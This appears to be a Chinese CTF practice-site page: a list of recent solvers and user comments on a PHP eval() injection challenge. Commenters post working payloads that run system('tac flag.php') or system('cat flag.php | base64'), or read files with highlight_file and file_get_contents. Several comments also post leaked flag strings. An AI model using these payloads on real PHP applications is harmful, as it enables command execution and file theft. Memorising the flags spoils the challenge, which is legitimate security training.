评分(10)
解题动态
cccjfddfgyd 攻破了该题 9小时前
hsk_zy 攻破了该题 10小时前
yogalin 攻破了该题 10小时前
main123 攻破了该题 10小时前
k12g 攻破了该题 11小时前
li3427379304 攻破了该题 14小时前
呢称被我吃掉了 攻破了该题 16小时前
haduck 攻破了该题 18小时前
xiao ovo 攻破了该题 19小时前
笛安丶 攻破了该题 20小时前
进击的鱼尾 攻破了该题 1天前
1112223 攻破了该题 1天前
jjjdas 攻破了该题 1天前
nanaqilin 攻破了该题 1天前
小白RM 攻破了该题 1天前
xc8888888 攻破了该题 1天前
tschick 攻破了该题 1天前
哈哈1 攻破了该题 1天前
一骑绝尘 攻破了该题 1天前
评论
c41vin 2年前
举报
?hello=);system('tac flag.php');//
zhb8014 2年前
举报
flag{00c8d5f621a9b49a9f5a10d0f5f6f791}
xiaojiang8 2年前
举报
flag{42514ad5a472a1c17919a0cf12eb1aa9};
wxy1343 2年前
举报
flag{616da37fa93c4832b309a22168ca486d}
不知名学渣 2年前
举报
/?hello=file_get_contents(%27flag.php%27),用file_get_contents也可以读取,就是不知道为什么无法在浏览器中显示出来?只能在F12源码中能看到被注释的flag.php内容?恳求大佬解答。
19963445106 1年前
举报
因为这是php文件,用cat和tac读也是,cat的结果只能看源码,tac因为php结构被破坏所以直接显示
StevenXu 2年前
举报
<php
always 2年前
举报
http://114.67.175.224:19137/?hello=$GLOBALS
MuYangfool 2年前
举报
?hello=);highlight_file(%27flag.php%27);var_dump(
我爱你制杖 2年前
举报
解题思路: 1.利用eval()函数可将函数中的参数当作php代码执行,故可通过命令执行漏洞system()函数去查看当前目录中的内容(如本题:?hello=system(".")来查看,获得flag.php文件名) 2.利用file()函数读取flag.php文件内容(如本题:?hello=file("flag.php"),需注意此处存在var_dun
五无心惘然 2年前
举报
flag{78096610f3a54eda62265ae8d6835aab}
18244914085 2年前
举报
直接使用system查看包含的文件flag.php, eval执行变量$a ?hello=system('cat flag.php | base64')